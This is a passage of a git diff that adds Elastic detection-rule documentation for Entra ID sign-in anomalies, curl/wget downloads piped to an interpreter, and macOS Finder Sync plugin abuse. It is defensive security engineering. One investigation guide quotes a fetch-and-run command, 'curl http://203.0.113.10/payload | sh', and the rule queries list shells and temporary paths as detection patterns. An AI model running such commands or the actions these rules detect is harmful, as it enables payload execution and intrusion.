sign-in behavior. Adversaries with stolen credentials or OAuth tokens may abuse Entra ID–managed or first-party client IDs to perform on-behalf-of (OBO) authentication, blending into legitimate cloud traffic while avoiding traditional interactive sign-in flows. This technique is commonly observed in OAuth phishing, token theft, and access broker operations, and may precede lateral movement, persistence, or data access via Microsoft Graph or other cloud resources. The rule uses a New Terms approach to identify first-seen combinations of the UPN and Client ID within a defined history window, helping surface unexpected client usage that may indicate compromised identities, malicious automation, or unauthorized application impersonation. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in +* Platform: Entra ID +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 9 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID User Sign-in with Unusual Client* + + +This rule identifies rare Azure Entra apps IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity. + + +*Possible investigation steps* + + +- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process. +- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt. +- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks. +- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password. +- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account. +- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources. +- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration. + + +*False positive analysis* + + +- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`. +- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`. +- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`. +- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`. +- Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication. +- Microsoft Feedback Portal UX generates benign first-seen client activity through PRT-based, non-interactive sign-ins and is excluded by application ID. +- Microsoft Teams routinely requests tokens for its internal Teams Services, IC3 Gateway, Chat Aggregator, and CMD Services resources; these client-resource combinations are excluded. +- Managed Windows devices routinely request OfficeHome PRTs with Microsoft 365 Copilot scopes through the standard Microsoft 365 desktop client; this combination is excluded. +- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`. +- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert. + + +*Response and remediation* + + +- Block the source IP address in `source.ip` if determined to be malicious. +- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies. +- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`. +- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks. +- Review conditional access policies to ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. +- Review Conditional Access policies to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. +- Implement a zero-trust security model by enforcing least privilege access and continuous authentication. +- Regularly review and update conditional access policies to ensure they are effective against evolving threats. +- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`. +- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks. +- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "azure.signinlogs" and event.category: "authentication" + and azure.signinlogs.properties.is_interactive: false + and azure.signinlogs.properties.user_type: "Member" + and not azure.signinlogs.properties.client_app_used: "Browser" + and not source.as.organization.name: "MICROSOFT-CORP-MSN-AS-BLOCK" + and not azure.signinlogs.properties.app_id: ( + "1b3c667f-cde3-4090-b60b-3d2abd0117f0" or + "26a7ee05-5602-4d76-a7ba-eae8b7b67941" or + "4b0964e4-58f1-47f4-a552-e2e1fc56dcd7" or + "ecd6b820-32c2-49b6-98a6-444530e5a77a" or + "268761a2-03f3-40df-8a8b-c3db24145b6b" or + "fc0f3af4-6835-4174-b806-f7db311fd2f3" or + "de50c81f-5f80-4771-b66b-cebd28ccdfc1" or + "ab9b8c07-8f02-4f72-87fa-80105867a763" or + "6f7e0f60-9401-4f5b-98e2-cf15bd5fd5e3" or + "d7b530a4-7680-4c23-a8bf-c52c121d2e87" or + "52c2e0b5-c7b6-4d11-a89c-21e42bcec444" or + "38aa3b87-a06d-4817-b275-7a316988d93b" or + "27922004-5251-4030-b22d-91ecd9a37ea4" or + "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223" or + "cab96880-db5b-4e15-90a7-f3f1d62ffe39" or + "3a4d129e-7f50-4e0d-a7fd-033add0a29f4" or + "29d9ed98-a469-4536-ade2-f981bc1d605e" or + "c0ab8ce9-e9a0-42e7-b064-33d422df41f1" or + "9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7" or + "4813382a-8fa7-425e-ab75-3b753aab3abb" or + "08e18876-6177-487e-b8b5-cf950c1e598c" or + "0ec893e0-5785-4de6-99da-4ed124e5296c" or + "d3590ed6-52b3-4102-aeff-aad2292ab01c" or + "0dc2408a-bbc0-4238-871e-13b372f0200f" or + "af124e86-4e96-495a-b70a-90f90ab96707" or + "e9c51622-460d-4d3d-952d-966a5b1da34c" or + "f44b1140-bc5e-48c6-8dc0-5cf5a53c0e34" or + "e2ef5054-0287-4db6-afa3-013d96881fd3" or + "82864fa0-ed49-4711-8395-a0e6003dca1f" or + "60c8bde5-3167-4f92-8fdb-059f6176dc0f" or + "5d661950-3475-41cd-a2c3-d671a3162bc1" or + "145fc680-eb72-4bcf-b4d5-8277021a1ce8" or + "c1c74fed-04c9-4704-80dc-9f79a2e515cb" or + "a2760c41-63c9-42b5-8d58-bfa1fd9e2eb3" or + "6dec647e-42c4-45a6-8f13-e8250d34e033" or + "c98e5057-edde-4666-b301-186a01b4dc58" or + "0a31c71e-0abf-4238-add7-b1a24c165dc1" or + "a8759234-4b8b-4d94-8c0a-ee1ab73af270" or + "dae89220-69ba-4957-a77a-47b78695e883" or + "fd5f78f6-a28f-450b-abc7-777f3dbbfcba" or + "821caec6-bec3-4542-bead-d3c5fb6b4ef0" or + "a40d7d7d-59aa-447e-a655-679a4107e548" or + "bed12bc0-3a62-470d-998c-e47546e7b039" or + "f4060917-6abe-40d7-baa6-f634c0eda4ac" or + "b26aadf8-566f-4478-926f-589f601d9c74" or + "1f7f6f43-2f81-429c-8499-293566d0ab0c" or + "75f31797-37c9-498e-8dc9-53c16a36afca" or + "3e050dd7-7815-46a0-8263-b73168a42c10" or + "243c63a3-247d-41c5-9d83-7788c43f1c43" or + "75efb5bc-18a1-4e7b-8a66-2ad2503d79c6" or + "d32f3b53-b7d7-48df-8d0f-f8bf233b3f1f" or + "95de633a-083e-42f5-b444-a4295d8e9314" or + "3ff8e6ba-7dc3-4e9e-ba40-ee12b60d6d48" or + "871c010f-5e61-4fb1-83ac-98610a7e9110" or + "3e62f81e-590b-425b-9531-cad6683656cf" or + "8ec6bc83-69c8-4392-8f08-b3c986009232" or + "d326c1ce-6cc6-4de2-bebc-4591e5e13ef0" or + "dd762716-544d-4aeb-a526-687b73838a22" or + "7f8f922d-7ee4-40a6-b435-aad8b84ebde0" or + "f8d98a96-0999-43f5-8af3-69971c7bb423" or + "aa580612-c342-4ace-9055-8edee43ccb89" or + "7f67af8a-fedc-4b08-8b4e-37c4d127b6cf" or + "00bf137d-f689-4c5d-83d9-7fc31904a7ea" or + "ceb96695-e468-48ba-ba21-35e2a242d396" or + "7fba38f4-ec1f-458d-906c-f4e3c4f41335" or + "a2a1fecc-b06e-4a1e-95c1-2afd94bcadff" or + "15ddab63-ba81-45db-9bb6-6f8bc445c459" or + "bc59ab01-8403-45c6-8796-ac3ef710b3e3" or + "00000003-0000-0ff1-ce00-000000000000" or + "4e291c71-d680-4d0e-9640-0a3358e31177" or + "4fb5cc57-dbbc-4cdc-9595-748adff5f414" or + "22098786-6e16-43cc-a27d-191a01a1e3b5" or + "ebde7daf-df42-4ade-81a4-d67b339b49e9" or + "c0d2a505-13b8-4ae0-aa9e-cddd5eab0b12" or + "a672d62c-fc7b-4e81-a576-e60dc46e951d" or + "0b1df6d3-2deb-44d4-b44b-7101937e0726" or + "04f0c124-f2bc-4f59-8241-bf6df9866bbd" or + "86f4c005-6582-4559-b6cf-8b3111236736" or + "a0a3c1d3-7b82-4010-bdb0-e7048fb8f1fe" or + "a187e399-0c36-4b98-8f04-1edc167a0996" or + "2d4d3d8e-2be3-4bef-9f87-7875a61c29de" or + "c475db56-f463-48d8-931a-cfa7cd642289" or + "71a7c376-13e6-4100-968e-92ce98c5d3d2" + ) + and not ( + azure.signinlogs.properties.app_id: "1fec8e78-bce4-4aaf-ab1b-5451cc387264" and + azure.signinlogs.properties.resource_id: ( + "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe" or + "39aaf054-81a5-48c7-a4f8-0293012095b9" or + "b1379a75-ce5e-4fa3-80c6-89bb39bf646c" or + "6bc3b958-689b-49f5-9006-36d165f30e00" + ) + ) + and not ( + azure.signinlogs.properties.app_id: "4765445b-32c6-49b0-83e6-1d93765276ca" and + azure.signinlogs.properties.resource_id: "4765445b-32c6-49b0-83e6-1d93765276ca" and + azure.signinlogs.properties.authentication_processing_details: *M365Copilot.Read.All* and + azure.signinlogs.properties.incoming_token_type: "primaryRefreshToken" and + azure.signinlogs.properties.client_app_used: "Mobile Apps and Desktop clients" and + azure.signinlogs.properties.device_detail.is_managed: true and + azure.signinlogs.properties.device_detail.operating_system: "Windows10" and + user_agent.original: Mozilla*Edge/18.* + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-non-managed-device.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-non-managed-device.asciidoc new file mode 100644 index 0000000000..be784990df --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-non-managed-device.asciidoc @@ -0,0 +1,147 @@ +[[prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-non-managed-device]] +=== Entra ID User Sign-in with Unusual Non-Managed Device + +Identifies when a Microsoft Entra ID user signs in from a device that is not typically used by the user and is not managed, which may indicate potential compromise or unauthorized access attempts. This rule detects unusual sign-in activity by comparing the device used for the sign-in against the user's typical device usage patterns. Adversaries may create and register a new device to obtain a Primary Refresh Token (PRT) and maintain persistent access. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pushsecurity.com/blog/consentfix +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Platform: Entra ID +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID User Sign-in with Unusual Non-Managed Device* + + +This rule detects when a Microsoft Entra ID user signs in from a device that is not typically used by the user, which may indicate potential compromise or unauthorized access attempts. This rule detects unusual sign-in activity by comparing the device used for the sign-in against the user's typical device usage patterns. Adversaries may create and register a new device to obtain a Primary Refresh Token (PRT) and maintain persistent access. + + +*Possible investigation steps* + +- Review the `azure.signinlogs.properties.user_principal_name` field to identify the user associated with the sign-in. +- Check the `azure.signinlogs.properties.device_detail.device_id` field to identify the device used for the sign-in. +- Review `azure.signinlogs.properties.incoming_token_type` to determine what tpe of security token was used for the sign-in, such as a Primary Refresh Token (PRT). +- Examine `azure.signinlogs.category` to determine if these were non-interactive or interactive sign-ins. +- Check the geolocation of the sign-in by reviewing `source.geo.country_name` and `source.geo.city_name` to identify the location of the device used for the sign-in. If these are unusual for the user, it may indicate a potential compromise. +- Review `azure.signinlogs.properties.app_id` to determine which client application was used for the sign-in. If the application is not recognized or expected, it may indicate unauthorized access. Adversaries use first-party client IDs to blend in with legitimate traffic. +- Examine `azure.signinlogs.properties.resource_id` to determine what resource the security token has in scope and/or is requesting access to. If the resource is not recognized or expected, it may indicate unauthorized access. Excessive access to Graph API is common post-compromise behavior. +- Review the identity protection risk status by checking `azure.signinlogs.properties.risk_level` and `azure.signinlogs.properties.risk_detail` to determine if the sign-in was flagged as risky by Entra ID Protection. + + +*False positive analysis* + +- Legitimate users may sign in from new devices, such as when using a new laptop or mobile device. If this is expected behavior, consider adjusting the rule or adding exceptions for specific users or device IDs. +- Environments where users frequently change devices, such as in a corporate setting with rotating hardware, may generate false positives. +- Users may use both an endpoint and mobile device for sign-ins, which could trigger this rule. +- Hybrid Azure AD joined devices often report `is_managed: false` when Intune MDM is not enrolled; that corporate hybrid-join state is excluded. Azure AD joined devices are kept in scope because OAuth phishing / ROADtx device registration commonly creates cloud-joined (not hybrid) unmanaged devices. +- Non-interactive sign-ins with `azure.signinlogs.properties.incoming_token_type` of `"none"` (common Microsoft first-party background token acquisition on registered devices) are excluded; `"primaryRefreshToken"` (PRT) and `"refreshToken"` activity remain in scope. + + +*Response and remediation* + +- If the sign-in is confirmed to be suspicious or unauthorized, take immediate action to revoke the access token and prevent further access. +- Disable the user account temporarily to prevent any potential compromise or unauthorized access. +- Review the user's recent sign-in activity and access patterns to identify any potential compromise or unauthorized access. +- If the user account is compromised, initiate a password reset and enforce multi-factor authentication (MFA) for the user. +- Review the conditional access policies in place to ensure they are sufficient to prevent unauthorized access to sensitive resources. +- Identify the registered Entra ID device by reviewing `azure.signinlogs.properties.device_detail.display_name` and confirm it is expected for the user or organization. If it is not expected, consider removing the device registration. +- Consider adding exceptions for verified devices that are known to be used by the user to reduce false-positives. + + +==== Setup + + + +*Required Microsoft Entra ID Sign-In Logs* + +This rule requires the Azure integration with Microsoft Entra ID Sign-In logs to be enabled and configured to collect audit and activity logs via Azure Event Hub. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "azure.signinlogs" and + event.category: "authentication" and + azure.signinlogs.properties.user_type: "Member" and + azure.signinlogs.properties.token_protection_status_details.sign_in_session_status: "unbound" and + not azure.signinlogs.properties.device_detail.is_managed: true and + not azure.signinlogs.properties.device_detail.device_id: "" and + not azure.signinlogs.properties.device_detail.trust_type: "Hybrid Azure AD joined" and + not (azure.signinlogs.category: "NonInteractiveUserSignInLogs" and azure.signinlogs.properties.incoming_token_type: "none") and + azure.signinlogs.properties.user_principal_name: * + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Device Registration +** ID: T1098.005 +** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc new file mode 100644 index 0000000000..6e1a739a6b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc @@ -0,0 +1,204 @@ +[[prebuilt-rule-8-19-32-file-downloaded-by-curl-wget-and-piped-to-interpreter]] +=== File Downloaded by Curl/Wget and Piped to Interpreter + +This rule detects when a file is downloaded by curl or wget, and piped to an interpreter. Attackers may use this technique to download and execute payloads for various malicious purposes, such as establishing persistence or exfiltrating data. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Command and Control +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating File Downloaded by Curl/Wget and Piped to Interpreter* + + +This rule identifies Linux activity where curl or wget retrieves content from a remote path and sends it directly to a shell or scripting interpreter, enabling code execution without first saving a conventional file. An attacker may run `curl http://203.0.113.10/payload | sh` to execute a staged payload and rapidly establish persistence or launch data theft. + + +*Possible investigation steps* + + +- Reconstruct the complete process ancestry and descendants to identify the initiating user, access vector, executed commands, and any follow-on payloads. +- Extract the remote URL, resolve redirects, assess domain and IP reputation, and safely retrieve the content for hashing, static analysis, and sandbox execution. +- Correlate DNS, proxy, firewall, and endpoint network telemetry to confirm the connection, transferred bytes, related destinations, and other affected hosts. +- Examine the host for persistence, dropped files, credential access, privilege escalation, account changes, or suspicious outbound connections occurring after the alert. +- Confirm whether the activity was authorized by the user or system owner, and isolate the host, block indicators, and revoke exposed credentials if malicious intent is established. + + +*False positive analysis* + + +- An administrator may use curl or wget to stream an approved installation or configuration script into a shell during deployment; verify the initiating account, change record, remote destination, and retrieved script contents. +- An automated Linux provisioning or maintenance task may fetch and execute a trusted script through an interpreter; confirm the process ancestry, expected schedule, command line, destination ownership, and consistency across authorized hosts. + + +*Response and remediation* + + +- Isolate the affected Linux host from the network while preserving volatile evidence, running processes, shell history, downloaded content, and relevant system logs. +- Block the malicious URL, domain, IP address, and payload hashes across DNS, proxy, firewall, endpoint, and email controls, and identify other hosts that contacted the same infrastructure. +- Terminate malicious processes and remove associated persistence from cron jobs, systemd units, shell profiles, startup scripts, SSH authorized keys, modified accounts, and files in locations such as `/tmp`, `/var/tmp`, and `/dev/shm`. +- Escalate immediately to incident response if privileged execution, credential theft, lateral movement, data exfiltration, or the same indicators on multiple hosts are identified, and rotate affected passwords, keys, tokens, and secrets. +- Reimage the system or restore it from a verified known-good image, validate package and configuration integrity, apply security updates, and monitor closely for renewed connections or execution. +- Prevent recurrence by restricting outbound access, allowlisting approved download sources, limiting curl and wget use for service accounts, and alerting on streamed interpreter execution and executables launched from temporary or memory-backed paths. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id, process.working_directory with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name in ("curl", "wget") and + ( + /* IP address and path */ + process.command_line regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}(:[0-9]{1,5})?\\/[^ ]+.*" or + /* URL and path */ + process.command_line regex ".*[A-Za-z0-9][A-Za-z0-9\\-]*(\\.[A-Za-z0-9][A-Za-z0-9\\-]*)+(:[0-9]{1,5})?\\/[^ ]+.*" + ) and + process.args_count <= 3 and ( + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox", "node", "deno", "ash", "mksh", "pwsh") or + process.parent.name like (".*", "python*", "perl*", "ruby*", "lua*", "php*") or + process.parent.executable like ( + "/tmp/*", "/var/tmp/*", "/dev/shm/*", "./*", "/run/*", "/var/run/*", "/boot/*", "/sys/*", "/lost+found/*", + "/proc/*", "/var/mail/*", "/var/www/*", "/dev/fd/*", "?memfd:*", "memfd:*" + ) + ) and + not ( + process.args in ("-h", "--help", "-V", "--version", "--output", "-O") or + process.args like ("--output*", "-o*", "--remote-name*") or + process.command_line like ("*127.0.0.1*", "*localhost*", "*artifacts.elastic.co*", "*ela.st*", "*elastic.co*") + )] + [process where host.os.type == "linux" and event.type == "end" and event.action == "end" and + process.name like ( + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", + "python*", "perl*", "ruby*", "lua*", "php*", "node" + ) and process.args_count == 1 and + process.args like ( + "-bash", "-dash", "-sh", "-tcsh", "-csh", "-zsh", "-ksh", "-fish", "-ash", "-mksh", "-pwsh", + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "ash", "mksh", "pwsh", + "/bin/bash", "/bin/dash", "/bin/sh", "/bin/tcsh", + "/bin/zsh", "/bin/ksh", "/bin/fish", + "/bin/csh", "/bin/ash", "/bin/mksh", "/bin/pwsh", + "/usr/bin/bash", "/usr/bin/dash", "/usr/bin/sh", "/usr/bin/tcsh", + "/usr/bin/csh", "/usr/bin/zsh", "/usr/bin/ksh", "/usr/bin/fish", + "/usr/bin/ash", "/usr/bin/mksh", "/usr/bin/pwsh", + "/usr/local/bin/bash", "/usr/local/bin/dash", "/usr/local/bin/sh", "/usr/local/bin/tcsh", + "/usr/local/bin/csh", "/usr/local/bin/zsh", "/usr/local/bin/ksh", "/usr/local/bin/fish", + "/usr/local/bin/ash", "/usr/local/bin/mksh", "/usr/local/bin/pwsh", + "python*", "/bin/python*", "/usr/bin/python*", "/usr/local/bin/python*", + "perl*", "/bin/perl*", "/usr/bin/perl*", "/usr/local/bin/perl*", + "ruby*", "/bin/ruby*", "/usr/bin/ruby*", "/usr/local/bin/ruby*", + "lua*", "/bin/lua*", "/usr/bin/lua*", "/usr/local/bin/lua*", + "php*", "/bin/php*", "/usr/bin/php*", "/usr/local/bin/php*", + "node", "/bin/node", "/usr/bin/node", "/usr/local/bin/node", + "/dev/fd/*", "?memfd:*", "memfd:*" + ) + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-finder-sync-plugin-registered-and-enabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-finder-sync-plugin-registered-and-enabled.asciidoc new file mode 100644 index 0000000000..107a0be637 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-finder-sync-plugin-registered-and-enabled.asciidoc @@ -0,0 +1,151 @@ +[[prebuilt-rule-8-19-32-finder-sync-plugin-registered-and-enabled]] +=== Finder Sync Plugin Registered and Enabled + +Finder Sync plugins enable users to extend Finder’s functionality by modifying the user interface. Adversaries may abuse this feature by adding a rogue Finder Plugin to repeatedly execute malicious payloads for persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/specterops/presentations/raw/master/Leo%20Pitt/Hey_Im_Still_in_Here_Modern_macOS_Persistence_SO-CON2020.pdf + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 213 + +*Rule authors*: + +* Elastic +* Massimo Bertocchi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Finder Sync Plugin Registered and Enabled* + + +Finder Sync plugins enhance macOS Finder by allowing third-party applications to integrate and modify its interface. While beneficial for legitimate software, adversaries can exploit this feature to maintain persistence by registering malicious plugins. The detection rule identifies suspicious plugin registrations by monitoring the `pluginkit` process, filtering out known safe applications, and flagging unusual activity, thus helping analysts spot potential threats. + + +*Possible investigation steps* + + +- Review the process details to confirm the execution of the `pluginkit` process with the specific arguments `-e`, `use`, and `-i`, which indicate the registration of a Finder Sync plugin. +- Cross-reference the plugin identifier found in the process arguments against the list of known safe applications to determine if it is potentially malicious. +- Investigate the parent process of the `pluginkit` execution to identify any unusual or unauthorized parent processes that might suggest malicious activity. +- Check the system for any recent installations or updates of applications that might have introduced the suspicious Finder Sync plugin. +- Analyze the 